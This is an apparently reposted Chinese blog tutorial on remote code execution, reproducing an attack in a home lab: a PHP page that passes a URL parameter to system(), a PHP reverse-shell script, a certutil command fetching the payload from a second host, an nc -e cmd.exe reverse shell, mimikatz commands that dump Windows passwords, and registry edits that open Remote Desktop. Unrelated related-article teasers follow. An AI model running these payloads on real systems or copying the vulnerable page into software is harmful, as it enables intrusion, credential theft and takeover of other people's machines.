RCE(远程代码执行漏洞)原理及漏洞利用

news2024/11/15 18:45:34
作用

RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

原理

远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器。 现在很多的甲方企业都开始实施自动化运维,大量的系统操作会通过"自动化运维平台"进行操作。在这种平台上往往会出现远程系统命令执行的漏洞。 远程代码执行 同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。 因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。

系统命令执行函数

system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()

windows系统命令拼接方式

“|”:管道符,前面命令标准输出,后面命令的标准输入。例如:help |more
“&” commandA & commandB 先运行命令A,然后运行命令B
“||” commandA || commandB 运行命令A,如果失败则运行命令B
“&&” commandA && commandB 运行命令A,如果成功则运行命令B

RCE漏洞复现

一台开启wnmp服务的win7的靶机

一台开启wnmp服务的win10用于传输文件

一台kali系统的虚拟机用于接收shell

一、复现环境

靶机:win10:ip:192.168.203.135

攻击机:win10:ip:192.168.123.150

get shell机:kali2020:ip:192.168.203.130

二、漏洞复现

1.靶机创建文件:1.php

<?php  
    header("Content-Type: text/html; charset=utf-8");
    error_reporting(0); //禁用错误报告  
    $a = $_GET["a"]; 
    system($a);
?>  

2.攻击机创建文件:2.php

<?php
set_time_limit(0);
$ip="192.168.203.130";  #kali ip
$port=3939;
$fp=@fsockopen($ip,$port,$errno,$errstr);
if(!$fp){ 
	echo "error";
	}
else{
	fputs($fp,"\n++++++++++connect success++++++++\n");
	while (!feof($fp)) {
	fputs($fp,"shell:");//输出
	$shell=fgets($fp);
	$message=`$shell`;
	fputs($fp,$message);

	}
	fclose($fp);
}

?>

3.访问1.php

靶机访问:

输入

http://192.168.203.135/1.php?a=ipconfig

发现可以执行cmd命令

攻击机也可访问:

漏洞利用

利用cmd命令远程下载文件 (1.txt不需要创建)

将2.php文件上传

certutil -urlcache -split -f http://192.168.123.150/1.txt 2.php

 使用kali的nc监听3939端口

nc -lvvp 3939

浏览器访问2.php文件

监听成功,成功get shell

其他利用
1.获取win7密码

如果靶机是win7,我们可以上传mimikatz.exe文件来获取win7系统的所有账号密码

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

在这里插入图片描述

获取账号密码后,就可以开启远程连接服务了

wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1

如果开启不成功,须执行以下命令

echo DO ALL IN CMD!
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

net start termservice

然后再开启一次

wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1

最后主机使用快捷键win+s,搜索mstsc 就可以打开windos远程桌面连接了
2.nc反弹

向靶机上传nc.exe文件

nc 192.168.203.130 3939 -e C:\windows\system32\cmd.exe

kali监听

nc -lvvp 3939

成功get shell
                       
原文链接:https://blog.csdn.net/weixin_46706771/article/details/118893434

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1971317.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

揭秘循环购模式:消费即收益

大家好&#xff0c;我是你们的电商策略顾问吴军。今天&#xff0c;我将带大家深入探索一种别开生面的商业模式——循环购模式。这种模式究竟有何魅力&#xff0c;能让消费者在享受购物乐趣的同时&#xff0c;还能获得额外的收益&#xff1f;更有趣的是&#xff0c;一些商家通过…

精准防控,高效管理:AI智能分析网关V4区域未停留检测算法的介绍及应用

一、区域未停留AI检测算法概述 随着人工智能和计算机视觉技术的飞速发展&#xff0c;区域未停留AI检测算法作为一种重要的视频分析技术&#xff0c;逐渐在各个领域得到广泛应用。该算法通过高效处理视频流数据&#xff0c;能够实时分析并判断目标对象是否在预设区域内有足够的…

influxdb 读取本地csv

官方链接 Query CSV data sources | Flux Documentation (influxdata.com) 我的是windows版本的OSS&#xff0c;如果直接把csv放在文件夹路径下读取会报错&#xff0c;官方也写了&#xff0c;这样是无法读取的 所以用了grafana开的web服务来实现读取csv的目的。 import &qu…

ts踩坑!在 Vue.js 中使用 Element Plus 组件库时,组件属性值所传类型需要与组件期望的类型一致。

在 Vue.js 中使用 Element Plus 组件库时&#xff0c;用el-tag组件举例&#xff0c; 属性值所传类型需要与组件期望的类型一致。 //当我们简单定义 举例&#xff1a;let tagType:string 或者&#xff1a; let tagType ref<string>()然后给el-tag的type属性赋值时&…

数据驱动决策:内容数据产品经理的成长与价值

数据驱动决策&#xff1a;内容数据产品经理的成长与价值 内容数据产品经理以数据为媒介&#xff0c;在用户与决策之间搭建桥梁&#xff0c;通过理解分析模型和用户决策路径&#xff0c;设计产品以促成更多决策产出&#xff0c;创造用户价值。例如&#xff0c;在衡量数据产品经理…

列表的单选和多选以及联动

<template><view><cu-custom bgColor"bg-gradual-white" :isBack"true"><block slot"backText">我的收藏</block></cu-custom><view class"top"><view>加油站</view><view …

地图下载软件与网站收藏(持续更新...)

慢慢记录总结学习工作中用到的有关地图下载的工具和网站 工具 图新地球 中科图新旗下的gis软件&#xff0c;官方地址&#xff1a;传送门 中文软件直接用就行&#xff0c;可以自行配置相关图源&#xff0c;有需要的化可以私信我。 全能地图下载器 Global Mapper Global Ma…

龙腾码支付系统三网免挂个人免签支付兼容易支付带详细教程

一、系统简介 码支付是基于ThinkPhp5.0 FastAdmin 开发的一套新型聚合收款、聚合支付系统&#xff0c;是一款专业的聚合免签收款系统,无需对接其余平台,个码就可收款,灰常的方便快捷,集成实现三网免挂功能,无需挂繁琐的监控软件就可实现回调,更便捷的监控方式,更优的产品质量,更…

苹果电脑上可以使用的快捷回复工具有哪些

很多客服都用苹果电脑回复客户提问&#xff0c;那么苹果电脑上都有哪些工具&#xff0c;可以实现快捷回复呢 摘要 目前&#xff0c;很多客服都用苹果电脑回复客户提问&#xff0c;快捷回复软件就是客服的刚需。众所周知&#xff0c;苹果电脑MAC系统的应用不如Windows系统多&am…

计算机毕业设计选题推荐-课程教学辅助系统-Java/Python项目实战

✨作者主页&#xff1a;IT研究室✨ 个人简介&#xff1a;曾从事计算机专业培训教学&#xff0c;擅长Java、Python、微信小程序、Golang、安卓Android等项目实战。接项目定制开发、代码讲解、答辩教学、文档编写、降重等。 ☑文末获取源码☑ 精彩专栏推荐⬇⬇⬇ Java项目 Python…

Intellij IDEA--选择圆括号(小括号)的内容的插件

原文网址&#xff1a;Intellij IDEA--选择圆括号(小括号)的内容的插件-CSDN博客 简介 本文介绍Intellij IDEA选择圆括号(小括号)内的内容的插件。本插件支持这些括号&#xff1a; "<>", "[]", "{}", "()"。 Java星球&#xf…

[Oracle]面试官:你说说rownum、currval与nextval分别是什么,还有没有其他的?

【版权声明】未经博主同意&#xff0c;谢绝转载&#xff01;&#xff08;请尊重原创&#xff0c;博主保留追究权&#xff09; https://blog.csdn.net/m0_69908381/article/details/140866513 出自【进步*于辰的博客】 文章目录 1、rownum1.1 介绍1.2 示例 2、nextval、currval2…

【读点论文】自然场景文本检测与识别的深度学习方法,分门别类的给定义做调研,对初入门者非常友好的工作,文本检测,识别,端到端识别

自然场景文本检测与识别的深度学习方法 abstract 许多自然场景图像中都包含丰富的文本,它们对于场景理解有着重要的作用。随着移动互联网技术的飞速发展,许多新的应用场景都需要利用这些文本信息,例如招牌识别和自动驾驶等。因此,自然场景文本的分析与处理也越来越成为计算机…

Spring相关框架整合Drools

7.1 Spring简单整合Drools a.第一步&#xff1a;创建maven工程drools_spring并配置pom.xml <?xml version"1.0" encoding"UTF-8"?> <project xmlns"http://maven.apache.org/POM/4.0.0"xmlns:xsi"http://www.w3.org/2001/XMLS…

【持续集成_02课_Jenkins+Git+Gogs综合应用】

https://www.cnblogs.com/xfeiyun/p/17510472.html Jenkins部署及持续集成——傻瓜式教程-腾讯云开发者社区-腾讯云 一、Jenkins安装 Jenkins由Java语言编写而成&#xff0c;安装包即是一个war包。因此&#xff0c;Jenkins的运行启动依赖于Java环境&#xff0c;同时&#xf…

GPT-4o mini一手测评:懂得不多,但答得极快

在性能方面,GPT-4o mini 在 MMLU 上的得分为 82%,在 LMSYS 排行榜的聊天方面分数优于 GPT-4。 OpenAI 突然上线新模型 GPT-4o mini, 声称要全面取代 GPT-3.5 Turbo。 在性能方面,GPT-4o mini 在 MMLU 上的得分为 82%,在 LMSYS 排行榜的聊天方面分数优于 GPT-4。 在价格…

收银系统源码-门店折扣活动应该怎么做

系统概况&#xff1a; 专门为零售行业的连锁店量身打造的收银系统&#xff0c;适用于常规超市、生鲜超市、水果店、便利店、零食专卖店、服装店、母婴用品、农贸市场等类型的门店使用。同时线上线下数据打通&#xff0c;线下收银的数据与小程序私域商城中的数据完全同步&#…

智能仪表板DevExpress Dashboard v24.1 - 新增级联参数过滤

使用DevExpress Analytics Dashboard&#xff0c;再选择合适的UI元素&#xff08;图表、数据透视表、数据卡、计量器、地图和网格&#xff09;&#xff0c;删除相应参数、值和序列的数据字段&#xff0c;就可以轻松地为执行主管和商业用户创建有洞察力、信息丰富的、跨平台和设…

Nuxt3: SEO优化——抽取页面内部Style标签样式

一、需求描述 升级Nuxt 3.12.4之后发现html增大&#xff0c;页面有大量的Style标签引入的css&#xff1a; 为了减少页面加载大小&#xff0c;需要将这些css抽取到独立的css文件中。 二、解决方案 Nuxt官网提供的有关extract css的有关配置大致有以下情况&#xff1a; 在nux…

问界M7是不是换壳东风ix7? 这下有答案了

文 | AUTO芯 作者 | 谦行 终于真相大白了 黑子们出来挨打啊 问界M7是换壳的东风ix7&#xff1f; 你们没想到&#xff0c;余大嘴会亲自出来正面回应吧 瞧瞧黑子当时乐的 问界你可以啊&#xff01;靠改名字造车呢&#xff1f; 还有更过分的&#xff0c;说M7是东风小康ix7…